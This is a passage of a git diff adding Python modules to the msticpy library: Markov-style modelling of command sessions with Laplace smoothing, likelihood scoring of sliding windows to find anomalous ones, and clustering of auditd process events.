+        for cmd in session:
+            seq1_counts[cmd.name] += 1
+            seq2_counts[prev][cmd.name] += 1
+            prev = cmd.name
+            pars = cmd.params
+            if isinstance(pars, set):
+                pars = dict.fromkeys(pars)
+            for par, val in pars.items():
+                param_counts[par] += 1
+                cmd_param_counts[cmd.name][par] += 1
+                if val:
+                    value_counts[val] += 1
+                    param_value_counts[par][val] += 1
+        seq2_counts[prev][end_token] += 1
+        seq1_counts[end_token] += 1
+
+    return (
+        seq1_counts,
+        seq2_counts,
+        param_counts,
+        cmd_param_counts,
+        value_counts,
+        param_value_counts,
+    )
+
+
+# pylint: disable=too-many-arguments
+def laplace_smooth_counts(
+    seq1_counts: DefaultDict[str, int],
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]],
+    param_counts: DefaultDict[str, int],
+    cmd_param_counts: DefaultDict[str, DefaultDict[str, int]],
+    value_counts: DefaultDict[str, int],
+    param_value_counts: DefaultDict[str, DefaultDict[str, int]],
+    start_token: str,
+    end_token: str,
+    unk_token: str,
+) -> Tuple[
+    StateMatrix, StateMatrix, StateMatrix, StateMatrix, StateMatrix, StateMatrix
+]:
+    """
+    Laplace smoothing is applied to the counts.
+
+    We do this by adding 1 to each of the counts.
+    This is so we shift some of the probability mass from the very probable
+    commands/params/values to the unseen and very unlikely commands/params/values.
+    The `unk_token` means we can handle unseen commands, params, values, sequences of
+    commands.
+
+    Parameters
+    ----------
+    seq1_counts: DefaultDict[str, int]
+        individual command counts
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]]
+        sequence command (length 2) counts
+    param_counts: DefaultDict[str, int]
+        individual param counts
+    cmd_param_counts: DefaultDict[str, DefaultDict[str, int]]
+        param conditional on command counts
+    value_counts: DefaultDict[str, int]
+        individual value counts
+    param_value_counts: DefaultDict[str, DefaultDict[str, int]]
+        value conditional on param counts
+    start_token: str
+        dummy command to signify the start of a session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of a session (e.g. "##END##")
+    unk_token: str
+        dummy command to signify an unseen command (e.g. "##UNK##")
+
+    Returns
+    -------
+    tuple of StateMatrix counts:
+        individual command counts,
+        sequence command (length 2) counts,
+        individual param counts,
+        param conditional on command counts
+        individual value counts,
+        value conditional on param counts
+
+    """
+    cmds: List[str] = list(seq1_counts.keys()) + [unk_token]
+
+    # apply laplace smoothing to the cmds
+    seq1_counts_ls, seq2_counts_ls = laplace_smooth_cmd_counts(
+        seq1_counts=copy.deepcopy(seq1_counts),
+        seq2_counts=copy.deepcopy(seq2_counts),
+        start_token=start_token,
+        end_token=end_token,
+        unk_token=unk_token,
+    )
+
+    params: List[str] = list(param_counts.keys()) + [unk_token]
+
+    # apply laplace smoothing to the params
+    param_counts_ls, cmd_param_counts_ls = laplace_smooth_param_counts(
+        cmds=cmds,
+        param_counts=copy.deepcopy(param_counts),
+        cmd_param_counts=copy.deepcopy(cmd_param_counts),
+        unk_token=unk_token,
+    )
+
+    # apply laplace smoothing for the values
+    value_counts_ls, param_value_counts_ls = laplace_smooth_value_counts(
+        params=params,
+        value_counts=copy.deepcopy(value_counts),
+        param_value_counts=copy.deepcopy(param_value_counts),
+        unk_token=unk_token,
+    )
+
+    seq1_counts_sm = StateMatrix(states=seq1_counts_ls, unk_token=unk_token)
+    seq2_counts_sm = StateMatrix(states=seq2_counts_ls, unk_token=unk_token)
+    param_counts_sm = StateMatrix(states=param_counts_ls, unk_token=unk_token)
+    cmd_param_counts_sm = StateMatrix(states=cmd_param_counts_ls, unk_token=unk_token)
+    value_counts_sm = StateMatrix(states=value_counts_ls, unk_token=unk_token)
+    param_value_counts_sm = StateMatrix(
+        states=param_value_counts_ls, unk_token=unk_token
+    )
+
+    return (
+        seq1_counts_sm,
+        seq2_counts_sm,
+        param_counts_sm,
+        cmd_param_counts_sm,
+        value_counts_sm,
+        param_value_counts_sm,
+    )
+
+
+def get_params_to_model_values(
+    param_counts: Union[StateMatrix, dict], param_value_counts: Union[StateMatrix, dict]
+) -> set:
+    """
+    Determine using heuristics which params take categoricals vs arbitrary strings.
+
+    This function helps us decide which params we should model
+    the values of later on.
+
+    Parameters
+    ----------
+    param_counts: Union[StateMatrix, dict]
+        counts of each of the individual params
+    param_value_counts: Union[StateMatrix, dict]
+        counts of each value conditional on the params
+
+    Returns
+    -------
+    set of params which have been determined to be categorical
+
+    """
+    param_stats = [
+        (param, len(vals), param_counts[param], 100 * len(vals) / param_counts[param])
+        for param, vals in param_value_counts.items()
+    ]
+
+    modellable_params = [
+        param[0]
+        for param in param_stats
+        if param[1] <= 20 <= param[2] and param[3] <= 10
+    ]
+
+    return set(modellable_params)
+
+
+# pylint: disable=too-many-arguments, too-many-branches
+def compute_prob_setofparams_given_cmd(
+    cmd: str,
+    params_with_vals: Union[dict, set],
+    param_cond_cmd_probs: Union[StateMatrix, dict],
+    value_cond_param_probs: Union[StateMatrix, dict],
+    modellable_params: Union[set, list],
+    use_geo_mean: bool = True,
+) -> float:
+    """
+    Compute probability of a set of params + values given the cmd.
+
+    Parameters
+    ----------
+    cmd: str
+        name of command (e.g. for Exchange powershell commands: "Set-Mailbox")
+    params_with_vals: Union[dict, set]
+        dict of accompanying params and values for the cmd
+        e.g for Exchange powershell commands::
+
+            {'Identity': 'an_identity' , 'ForwardingEmailAddress': 'email@email.com'}
+
+        If params is set to be a set, then an artificial dictionary will
+        be created with the set as the keys and Nones for the values.
+    param_cond_cmd_probs: Union[StateMatrix, dict]
+        computed probabilities of params conditional on the command
+    value_cond_param_probs: Union[StateMatrix, dict]
+        computed probabilities of values conditional on the param
+    modellable_params: set
+        set of params for which we will also include the probabilties
+        of their values in the calculation of the likelihood
+    use_geo_mean: bool
+        if True, then the likelihood will be raised to the power of (1/K)
+        where K is the number of distinct params which appeared for the
+        given `cmd` across our training set + the number of
+        values which we included in the modelling for this cmd.
+        Note: some commands may have more params set in general compared
+        with other commands. It can be useful to use the geo mean
+        so that you can compare this probability across different
+        commands with differing number of params.
+
+    Returns
+    -------
+    computed probability
+
+    """
+    pars = params_with_vals.copy()
+    if isinstance(pars, set):
+        pars = dict.fromkeys(pars)
+    if len(pars) == 0:
+        return 1.0
+    ref_cmd = param_cond_cmd_probs[cmd]
+    lik: float = 1
+    num = 0
+    for param, prob in ref_cmd.items():
+        if param in pars:
+            lik *= prob
+            if param in modellable_params:
+                num += 1
+                val = pars[param]
+                lik *= value_cond_param_probs[param][val]
+        else:
+            lik *= 1 - prob
+    if use_geo_mean:
+        k = len(ref_cmd) + num
+        if k > 0:
+            lik = lik ** (1 / k)
+
+    return lik
+
+
+# pylint: disable=too-many-locals, too-many-arguments, too-many-branches
+def compute_likelihood_window(
+    window: List[Cmd],
+    prior_probs: Union[StateMatrix, dict],
+    trans_probs: Union[StateMatrix, dict],
+    param_cond_cmd_probs: Union[StateMatrix, dict],
+    value_cond_param_probs: Union[StateMatrix, dict],
+    modellable_params: set,
+    use_start_token: bool,
+    use_end_token: bool,
+    start_token: str = None,
+    end_token: str = None,
+) -> float:
+    """
+    Compute the likelihood of the input `window`.
+
+    Parameters
+    ----------
+    window: List[Cmd]
+        part or all of a session, where a session is a list the Cmd datatype
+        an example session::
+
+            [
+                Cmd(name='Set-User', params={'Identity': 'blahblah', 'Force': 'true'}),
+                Cmd(name='Set-Mailbox',
+                    params={'Identity': 'blahblah', 'AuditEnabled': 'false'})
+            ]
+
+    prior_probs: Union[StateMatrix, dict]
+        computed probabilities of individual commands
+    trans_probs: Union[StateMatrix, dict]
+        computed probabilities of sequences of commands (length 2)
+    param_cond_cmd_probs: Union[StateMatrix, dict]
+        computed probabilities of the params conditional on the commands
+    value_cond_param_probs: Union[StateMatrix, dict]
+        computed probabilities of the values conditional on the params
+    modellable_params: set
+        set of params for which we will also include the probabilties
+        of their values in the calculation of the likelihood
+    use_start_token: bool
+        if set to True, the start_token will be prepended to the
+        window before the likelihood calculation is done
+    use_end_token: bool
+        if set to True, the end_token will be appended to the window
+        before the likelihood calculation is done
+    start_token: str
+        dummy command to signify the start of the session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of the session (e.g. "##END##")
+
+    Returns
+    -------
+    likelihood of the window
+
+    """
+    if use_start_token:
+        if start_token is None:
+            raise MsticpyException(
+                "start_token should not be None, when use_start_token is True"
+            )
+    if use_end_token:
+        if end_token is None:
+            raise MsticpyException(
+                "end_token should not be None, when use_end_token is True"
+            )
+
+    w_len = len(window)
+    if w_len == 0:
+        return np.nan
+    prob: float = 1
+
+    cur_cmd = window[0].name
+    params = window[0].params
+    param_vals_prob = compute_prob_setofparams_given_cmd(
+        cmd=cur_cmd,
+        params_with_vals=params,
+        param_cond_cmd_probs=param_cond_cmd_probs,
+        value_cond_param_probs=value_cond_param_probs,
+        modellable_params=modellable_params,
+        use_geo_mean=True,
+    )
+
+    if use_start_token:
+        prob *= trans_probs[start_token][cur_cmd] * param_vals_prob
+    else:
+        prob *= prior_probs[cur_cmd] * param_vals_prob
+
+    for i in range(1, w_len):
+        prev, cur = window[i - 1], window[i]
+        prev_cmd, cur_cmd = prev.name, cur.name
+        cur_par = cur.params
+        prob *= trans_probs[prev_cmd][cur_cmd]
+        param_vals_prob = compute_prob_setofparams_given_cmd(
+            cmd=cur_cmd,
+            params_with_vals=cur_par,
+            param_cond_cmd_probs=param_cond_cmd_probs,
+            value_cond_param_probs=value_cond_param_probs,
+            modellable_params=modellable_params,
+            use_geo_mean=True,
+        )
+        prob *= param_vals_prob
+
+    if use_end_token:
+        prob *= trans_probs[cur_cmd][end_token]
+
+    return prob
+
+
+# pylint: disable=too-many-locals, too-many-arguments
+def compute_likelihood_windows_in_session(
+    session: List[Cmd],
+    prior_probs: Union[StateMatrix, dict],
+    trans_probs: Union[StateMatrix, dict],
+    param_cond_cmd_probs: Union[StateMatrix, dict],
+    value_cond_param_probs: Union[StateMatrix, dict],
+    modellable_params: set,
+    window_len: int,
+    use_start_end_tokens: bool,
+    start_token: str = None,
+    end_token: str = None,
+    use_geo_mean: bool = False,
+) -> List[float]:
+    """
+    Compute the likelihoods of a sliding window of `window_len` in the session.
+
+    Parameters
+    ----------
+    session: List[Cmd]
+        list of Cmd datatype
+        an example session::
+
+            [
+                Cmd(
+                    name='Set-User',
+                    params={'Identity': 'blahblah', 'Force': 'true'}
+                ),
+                Cmd(
+                    name='Set-Mailbox',
+                    params={'Identity': 'blahblah', 'AuditEnabled': 'false'}
+                )
+            ]
+
+    prior_probs: Union[StateMatrix, dict]
+        computed probabilities of individual commands
+    trans_probs: Union[StateMatrix, dict]
+        computed probabilities of sequences of commands (length 2)
+    param_cond_cmd_probs: Union[StateMatrix, dict]
+        computed probabilities of the params conditional on the commands
+    value_cond_param_probs: Union[StateMatrix, dict]
+        computed probabilities of the values conditional on the params
+    modellable_params: set
+        set of params for which we will also include the probabilties
+        of their values in the calculation of the likelihood
+    window_len: int
+        length of sliding window for likelihood calculations
+    use_start_end_tokens: bool
+        if True, then `start_token` and `end_token` will be prepended
+        and appended to the session respectively before the calculations
+        are done
+    start_token: str
+        dummy command to signify the start of the session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of the session (e.g. "##END##")
+    use_geo_mean: bool
+        if True, then each of the likelihoods of the sliding windows
+        will be raised to the power of (1/`window_len`)
+
+    Returns
+    -------
+    list of likelihoods
+
+    """
+    if use_start_end_tokens and (start_token is None or end_token is None):
+        raise MsticpyException(
+            "start_token and end_token should not be set to None when "
+            "use_start_end_tokens is set to True"
+        )
+
+    likelihoods = []
+    sess = session.copy()
+    if use_start_end_tokens and end_token:
+        sess += [Cmd(name=str(end_token), params={})]
+    end = len(sess) - window_len
+    for i in range(end + 1):
+        window = sess[i : i + window_len]  # noqa E203
+        use_start = use_start_end_tokens if i == 0 else False
+        lik = compute_likelihood_window(
+            window=window,
+            prior_probs=prior_probs,
+            trans_probs=trans_probs,
+            param_cond_cmd_probs=param_cond_cmd_probs,
+            value_cond_param_probs=value_cond_param_probs,
+            modellable_params=modellable_params,
+            use_start_token=use_start,
+            use_end_token=False,
+            start_token=start_token,
+            end_token=end_token,
+        )
+        if use_geo_mean:
+            k = window_len
+            lik = lik ** (1 / k)
+        likelihoods.append(lik)
+
+    return likelihoods
+
+
+# pylint: disable=too-many-arguments
+def rarest_window_session(
+    session: List[Cmd],
+    prior_probs: Union[StateMatrix, dict],
+    trans_probs: Union[StateMatrix, dict],
+    param_cond_cmd_probs: Union[StateMatrix, dict],
+    value_cond_param_probs: Union[StateMatrix, dict],
+    modellable_params: set,
+    window_len: int,
+    use_start_end_tokens: bool,
+    start_token: str,
+    end_token: str,
+    use_geo_mean: bool = False,
+) -> Tuple[List[Cmd], float]:
+    """
+    Find and compute likelihood of the rarest window of `window_len` in the session.
+
+    Parameters
+    ----------
+    session: List[Cmd]
+        list of Cmd datatype
+        an example session::
+
+            [
+                Cmd(
+                    name='Set-User',
+                    params={'Identity': 'blahblah', 'Force': 'true'}
+                ),
+                Cmd(
+                    name='Set-Mailbox',
+                    params={'Identity': 'blahblah', 'AuditEnabled': 'false'}
+                )
+            ]
+
+    prior_probs: Union[StateMatrix, dict]
+        computed probabilities of individual commands
+    trans_probs: Union[StateMatrix, dict]
+        computed probabilities of sequences of commands (length 2)
+    param_cond_cmd_probs: Union[StateMatrix, dict]
+        computed probabilities of the params conditional on the commands
+    value_cond_param_probs: Union[StateMatrix, dict]
+        computed probabilities of the values conditional on the params
+    modellable_params: set
+        set of params for which we will also include the probabilties of
+        their values in the calculation of the likelihood
+    window_len: int
+        length of sliding window for likelihood calculations
+    use_start_end_tokens: bool
+        if True, then `start_token` and `end_token` will be prepended
+        and appended to the session respectively before the calculations are done
+    start_token: str
+        dummy command to signify the start of the session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of the session (e.g. "##END##")
+    use_geo_mean: bool
+        if True, then each of the likelihoods of the sliding windows
+        will be raised to the power of (1/`window_len`)
+
+    Returns
+    -------
+    Tuple:
+        rarest window part of the session,
+        likelihood of the rarest window
+
+    """
+    likelihoods = compute_likelihood_windows_in_session(
+        session=session,
+        prior_probs=prior_probs,
+        trans_probs=trans_probs,
+        param_cond_cmd_probs=param_cond_cmd_probs,
+        value_cond_param_probs=value_cond_param_probs,
+        modellable_params=modellable_params,
+        window_len=window_len,
+        use_start_end_tokens=use_start_end_tokens,
+        start_token=start_token,
+        end_token=end_token,
+        use_geo_mean=use_geo_mean,
+    )
+    if len(likelihoods) == 0:
+        return [], np.nan
+    min_lik = min(likelihoods)
+    ind = likelihoods.index(min_lik)
+    return session[ind : ind + window_len], min_lik  # noqa E203
diff --git a/msticpy/analysis/anomalous_sequence/utils/data_structures.py b/msticpy/analysis/anomalous_sequence/utils/data_structures.py
new file mode 100644
index 000000000..a0fbc159e
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/utils/data_structures.py
@@ -0,0 +1,123 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Useful helper data structure classes for modelling sessions."""
+
+from collections import defaultdict
+from typing import Union
+
+from ....common.exceptions import MsticpyException
+
+
+class StateMatrix(dict):
+    """Class for storing trained counts/probabilities."""
+
+    def __init__(self, states: Union[dict, defaultdict], unk_token: str):
+        """
+        Containr for dict of counts/probs or dict of dicts of cond counts/probs.
+
+        If you try and retrieve the count/probability for an unseen
+        command/param/value from the resulting object, it will return
+        the value associated with the `unk_token` key.
+
+        Parameters
+        ----------
+        states: Union[dict, defaultdict]
+            Either a dict representing counts or probabilities.
+            Or a dict of dicts representing
+            conditional counts or conditional probabilities.
+            E.g.::
+
+                {'Set-Mailbox': 20,'##UNK##': 1}
+
+            or::
+
+                {'Set-Mailbox': {'Set-Mailbox': 5, '##UNK##': 1},
+                '##UNK##': {'Set-Mailbox': 1, '##UNK##': 1}}
+
+        unk_token: str
+            dummy token to signify an unseen command (e.g. "##UNK##").
+            This token should be present in the `states` keys. And if `states`
+            is a dict of dicts, then the `unk_token` should be present in
+            the keys of the outer dict and all the inner dicts.
+
+        """
+        super().__init__(states)
+        if unk_token not in states:
+            raise MsticpyException("`unk_token` should be a key in `states`")
+        self.states = dict(states)
+        self.unk_token = unk_token
+        for key, val in self.states.items():
+            if isinstance(val, dict):
+                self.states[key] = StateMatrix(self.states[key], unk_token)
+
+    def __getitem__(self, item):
+        """
+        Get value or self.unk_token for unseen cmds/params/values.
+
+        Parameters
+        ----------
+        item:
+            desired key to retrieve value for from the dictionary
+
+        Returns
+        -------
+        Value associated with the key `item` if it exists, else the
+        value associated with the `unk_token`
+
+        """
+        if item not in self.states:
+            return self.states[self.unk_token]
+        return self.states[item]
+
+
+class Cmd:
+    """Class to store commands with accompanying params (and optionally values)."""
+
+    def __init__(self, name: str, params: Union[set, dict]):
+        """
+        Instantiate the Cmd class.
+
+        Parameters
+        ----------
+        name: str
+            name of the command. e.g. for Exchange online: "Set-Mailbox"
+        params: Union[set, dict]
+            set of accompanying params or dict of accompanying params and values.
+            e.g.::
+
+                {'Identity', 'ForwardingEmailAddress'}
+
+            or::
+
+                {'Identity': 'some identity', 'ForwardingEmailAddress':
+                 'an_email@email.com'}
+
+
+        """
+        self.name = name
+        self.params = params
+
+    def __str__(self):
+        """
+        Make string representation more pleasing to the eye.
+
+        Returns
+        -------
+        New string representation of the object
+
+        """
+        return f"Cmd(name='{self.name}', params={self.params})"
+
+    def __repr__(self):
+        """
+        Make object representation more pleasing to the eye.
+
+        Returns
+        -------
+        New string representation of the object
+
+        """
+        return str(self)
diff --git a/msticpy/analysis/anomalous_sequence/utils/laplace_smooth.py b/msticpy/analysis/anomalous_sequence/utils/laplace_smooth.py
new file mode 100644
index 000000000..760d1a229
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/utils/laplace_smooth.py
@@ -0,0 +1,142 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Helper module for laplace smoothing counts."""
+
+from typing import Tuple, List, DefaultDict
+import copy
+
+
+def laplace_smooth_cmd_counts(
+    seq1_counts: DefaultDict[str, int],
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]],
+    start_token: str,
+    end_token: str,
+    unk_token: str,
+) -> Tuple[DefaultDict[str, int], DefaultDict[str, DefaultDict[str, int]]]:
+    """
+    Apply laplace smoothing to the input counts for the cmds.
+
+    In particular, add 1 to each of the counts, including the unk_token. By including the
+    unk_token, we can handle unseen commands.
+
+    Parameters
+    ----------
+    seq1_counts: DefaultDict[str, int]
+        individual command counts
+    seq2_counts: DefaultDict[str, DefaultDict[str, int]]
+        sequence command (length 2) counts
+    start_token: str
+        dummy command to signify the start of a session (e.g. "##START##")
+    end_token: str
+        dummy command to signify the end of a session (e.g. "##END##")
+    unk_token: str
+        dummy command to signify an unseen command (e.g. "##UNK##")
+
+    Returns
+    -------
+    tuple of laplace smoothed counts:
+        individual command counts,
+        sequence command (length 2) counts
+
+    """
+    seq1_counts_ls = copy.deepcopy(seq1_counts)
+    seq2_counts_ls = copy.deepcopy(seq2_counts)
+
+    cmds: List[str] = list(seq1_counts_ls.keys()) + [unk_token]
+    for cmd1 in cmds:
+        for cmd2 in cmds:
+            if cmd1 != end_token and cmd2 != start_token:
+                seq1_counts_ls[cmd1] += 1
+                seq2_counts_ls[cmd1][cmd2] += 1
+                seq1_counts_ls[cmd2] += 1
+
+    return seq1_counts_ls, seq2_counts_ls
+
+
+def laplace_smooth_param_counts(
+    cmds: List[str],
+    param_counts: DefaultDict[str, int],
+    cmd_param_counts: DefaultDict[str, DefaultDict[str, int]],
+    unk_token: str,
+) -> Tuple[DefaultDict[str, int], DefaultDict[str, DefaultDict[str, int]]]:
+    """
+    Apply laplace smoothing to the input counts for the params.
+
+    In particular, add 1 to each of the counts, including the unk_token. By including the
+    unk_token, we can handle unseen params.
+
+    Parameters
+    ----------
+    cmds: List[str]
+        list of all the possible commands (including the unk_token)
+    param_counts: DefaultDict[str, int]
+        individual param counts
+    cmd_param_counts: DefaultDict[str, DefaultDict[str, int]]
+        param conditional on command counts
+    unk_token: str
+        dummy command to signify an unseen command (e.g. "##UNK##")
+
+    Returns
+    -------
+    Tuple:
+        individual param probabilities,
+        param conditional on command probabilities
+
+    """
+    param_counts_ls = copy.deepcopy(param_counts)
+    cmd_param_counts_ls = copy.deepcopy(cmd_param_counts)
+
+    params: List[str] = list(param_counts.keys()) + [unk_token]
+    for cmd in cmds:
+        for param in params:
+            if param in cmd_param_counts_ls[cmd] or param == unk_token:
+                param_counts_ls[param] += 1
+                cmd_param_counts_ls[cmd][param] += 1
+
+    return param_counts_ls, cmd_param_counts_ls
+
+
+def laplace_smooth_value_counts(
+    params: List[str],
+    value_counts: DefaultDict[str, int],
+    param_value_counts: DefaultDict[str, DefaultDict[str, int]],
+    unk_token: str,
+) -> Tuple[DefaultDict[str, int], DefaultDict[str, DefaultDict[str, int]]]:
+    """
+    Apply laplace smoothing to the input counts for the values.
+
+    In particular, add 1 to each of the counts, including the unk_token. By including the
+    unk_token, we can handle unseen values.
+
+    Parameters
+    ----------
+    params: List[str]
+        list of all possible params, including the unk_token
+    value_counts: DefaultDict[str, int]
+        individual value counts
+    param_value_counts: DefaultDict[str, DefaultDict[str, int]]
+        value conditional on param counts
+    unk_token: str
+        dummy command to signify an unseen command (e.g. "##UNK##")
+
+    Returns
+    -------
+    Tuple:
+        individual value probabilities,
+        value conditional on param probabilities
+
+    """
+    value_counts_ls = copy.deepcopy(value_counts)
+    param_value_counts_ls = copy.deepcopy(param_value_counts)
+
+    values: List[str] = list(value_counts_ls.keys()) + [unk_token]
+    for param in params:
+        for value in values:
+            if value in param_value_counts_ls[param] or value == unk_token:
+                value_counts_ls[value] += 1
+                param_value_counts_ls[param][value] += 1
+
+    return value_counts_ls, param_value_counts_ls
diff --git a/msticpy/analysis/anomalous_sequence/utils/probabilities.py b/msticpy/analysis/anomalous_sequence/utils/probabilities.py
new file mode 100644
index 000000000..e9978ff31
--- /dev/null
+++ b/msticpy/analysis/anomalous_sequence/utils/probabilities.py
@@ -0,0 +1,186 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Helper module for computing training probabilities when modelling sessions."""
+
+from collections import defaultdict
+from typing import Tuple, Union, DefaultDict
+
+from ..utils.data_structures import StateMatrix
+
+
+def compute_cmds_probs(  # nosec
+    seq1_counts: Union[StateMatrix, dict],
+    seq2_counts: Union[StateMatrix, dict],
+    unk_token: str,
+) -> Tuple[StateMatrix, StateMatrix]:
+    """
+    Compute command related probabilities.
+
+    In particular, computes the probabilities for the individual commands,
+    and also the probabilities for the transitions of commands.
+
+    Parameters
+    ----------
+    seq1_counts: Union[StateMatrix, dict]
+        individual command counts
+    seq2_counts: Union[StateMatrix, dict]
+        sequence command (length 2) counts
+    unk_token: str
+        dummy command to signify an unseen command (e.g. "##UNK##")
+
+    Returns
+    -------
+    Tuple:
+        individual command probabilities,
+        sequence command (length 2) probabilities
+
+    """
+    total_cmds = sum(seq1_counts.values())
+
+    prior_probs: DefaultDict[str, float] = defaultdict(lambda: 0)
+    trans_probs: DefaultDict[str, DefaultDict[str, float]] = defaultdict(
+        lambda: defaultdict(lambda: 0)
+    )
+
+    # compute prior probs
+    for cmd in seq1_counts:
+        prior_probs[cmd] = seq1_counts[cmd] / total_cmds
+
+    # compute trans probs
+    for prev, currents in seq2_counts.items():
+        for current in currents:
+            trans_probs[prev][current] = seq2_counts[prev][current] / sum(
+                seq2_counts[prev].values()
+            )
+
+    prior_probs_sm = StateMatrix(states=prior_probs, unk_token=unk_token)
+    trans_probs_sm = StateMatrix(states=trans_probs, unk_token=unk_token)
+
+    return prior_probs_sm, trans_probs_sm
+
+
+def compute_params_probs(  # nosec
+    param_counts: Union[StateMatrix, dict],
+    cmd_param_counts: Union[StateMatrix, dict],
+    seq1_counts: Union[StateMatrix, dict],
+    unk_token: str,
+) -> Tuple[StateMatrix, StateMatrix]:
+    """
+    Compute param related probabilities.
+
+    In particular, computes the probabilities of the individual params,
+    and also the probabilities of the params conditional on the command.
+
+    Note that we will be modelling whether a parameter is present or not
+    for each command. So we make the modelling assumption that the
+    parameters are independent Bernoulii random variables conditional
+    on the command.
+
+    Note also that because multiple parameters can appear at a time for
+    a command, and because we are computing the probability that each
+    parameter is present or not, we do NOT expect the probabilities to
+    sum to 1.
+
+    Note also that we use laplace smoothing in the counting
+    stage of the calculations. Therefore if you have parameter p which
+    appeared for every occurrence of command c, the resulting
+    probability for param p appearing conditional on command c would
+    NOT equal 1. It would be slightly less due to the laplace smoothing.
+
+    Parameters
+    ----------
+    param_counts: Union[StateMatrix, dict]
+        individual param counts
+    cmd_param_counts: Union[StateMatrix, dict]
+        param conditional on command counts
+    seq1_counts: Union[StateMatrix, dict]
+        individual command counts
+    unk_token: str
+        dummy command to signify an unseen command (e.g. "##UNK##")
+
+    Returns
+    -------
+    Tuple:
+        individual param probabilities,
+        param conditional on command probabilities
+
+    """
+    param_probs: DefaultDict[str, float] = defaultdict(lambda: 0)
+    param_cond_cmd_probs: DefaultDict[str, DefaultDict[str, float]] = defaultdict(
+        lambda: defaultdict(lambda: 0)
+    )
+
+    for cmd, params in cmd_param_counts.items():
+        n_cmd = seq1_counts[cmd]
+        for param, count in params.items():
+            param_cond_cmd_probs[cmd][param] = count / n_cmd
+
+    tot_cmd = sum(seq1_counts.values())
+    for param, count in param_counts.items():
+        param_probs[param] = count / tot_cmd
+
+    param_probs_sm = StateMatrix(states=param_probs, unk_token=unk_token)
+    param_cond_cmd_probs_sm = StateMatrix(
+        states=param_cond_cmd_probs, unk_token=unk_token
+    )
+
+    return param_probs_sm, param_cond_cmd_probs_sm
+
+
+def compute_values_probs(  # nosec
+    value_counts: Union[StateMatrix, dict],
+    param_value_counts: Union[StateMatrix, dict],
+    unk_token: str,
+) -> Tuple[StateMatrix, StateMatrix]:
+    """
+    Compute value related probabilities.
+
+    In particular, compute the probabilities of the individual values,
+    and also the probabilities of the values conditional on the param.
+
+    Note that we will be modelling the values as categorical conditional
+    on the parameter. Therefore, we DO expect these probabilities to sum
+    to 1.
+
+    Note also that each parameter can only take one value at a time
+    (unlike how a command can take multiple parameters at a time).
+
+    Parameters
+    ----------
+    value_counts: Union[StateMatrix, dict]
+        individual value counts
+    param_value_counts: Union[StateMatrix, dict]
+        value conditional on param counts
+    unk_token: str
+        dummy command to signify an unseen command (e.g. "##UNK##")
+
+    Returns
+    -------
+    Tuple:
+        individual value probabilities,
+        value conditional on param probabilities
+
+    """
+    value_probs: DefaultDict[str, float] = defaultdict(lambda: 0)
+    value_cond_param_probs: DefaultDict[str, DefaultDict[str, float]] = defaultdict(
+        lambda: defaultdict(lambda: 0)
+    )
+
+    for param, values in param_value_counts.items():
+        n_val = sum(values.values())
+        for value, count in values.items():
+            value_cond_param_probs[param][value] = count / n_val
+
+    tot_val = sum(value_counts.values())
+    for value, count in value_counts.items():
+        value_probs[value] = count / tot_val
+
+    value_probs_sm = StateMatrix(states=value_probs, unk_token=unk_token)
+    value_cond_param_probs_sm = StateMatrix(
+        states=value_cond_param_probs, unk_token=unk_token
+    )
+
+    return value_probs_sm, value_cond_param_probs_sm
diff --git a/msticpy/analysis/cluster_auditd.py b/msticpy/analysis/cluster_auditd.py
new file mode 100644
index 000000000..cdfada9f7
--- /dev/null
+++ b/msticpy/analysis/cluster_auditd.py
@@ -0,0 +1,105 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Auditd cluster function."""
+import pandas as pd
+
+from .eventcluster import dbcluster_events, add_process_features
+
+
+from .._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+def cluster_auditd_processes(audit_data: pd.DataFrame, app: str = None) -> pd.DataFrame:
+    """
+    Clusters process data into specific processes.
+
+    Parameters
+    ----------
+    audit_data : pd.DataFrame
+        The Audit data containing process creation events
+    app: str, optional
+        The name of a specific app you wish to cluster
+
+    Returns
+    -------
+    pd.DataFrame
+        Details of the clustered process
+
+    """
+    if app is not None:
+        processes = audit_data[audit_data["exe"].str.contains(app, na=False)]
+    else:
+        processes = audit_data
+    processes = processes.rename(
+        columns={
+            "acct": "SubjectUserName",
+            "uid": "SubjectUserSid",
+            "user": "SubjectUserName",
+            "ses": "SubjectLogonId",
+            "pid": "NewProcessId",
+            "exe": "NewProcessName",
+            "ppid": "ProcessId",
+            "cmdline": "CommandLine",
+        }
+    )
+    req_cols = [
+        "cwd",
+        "SubjectUserName",
+        "SubjectUserSid",
+        "SubjectUserName",
+        "SubjectLogonId",
+        "NewProcessId",
+        "NewProcessName",
+        "ProcessId",
+        "CommandLine",
+    ]
+    for col in req_cols:
+        if col not in processes:
+            processes[col] = ""
+
+    feature_procs_h1 = add_process_features(input_frame=processes)
+
+    clus_events, _, _ = dbcluster_events(
+        data=feature_procs_h1,
+        cluster_columns=["pathScore", "SubjectUserSid"],
+        time_column="TimeGenerated",
+        max_cluster_distance=0.0001,
+    )
+    (
+        clus_events.sort_values("TimeGenerated")[
+            [
+                "TimeGenerated",
+                "LastEventTime",
+                "NewProcessName",
+                "CommandLine",
+                "SubjectLogonId",
+                "SubjectUserSid",
+                "pathScore",
+                "isSystemSession",
+                "ProcessId",
+                "ClusterSize",
+            ]
+        ].sort_values("ClusterSize", ascending=True)
+    )
+
+    procs = clus_events[
+        [
+            "TimeGenerated",
+            "NewProcessName",
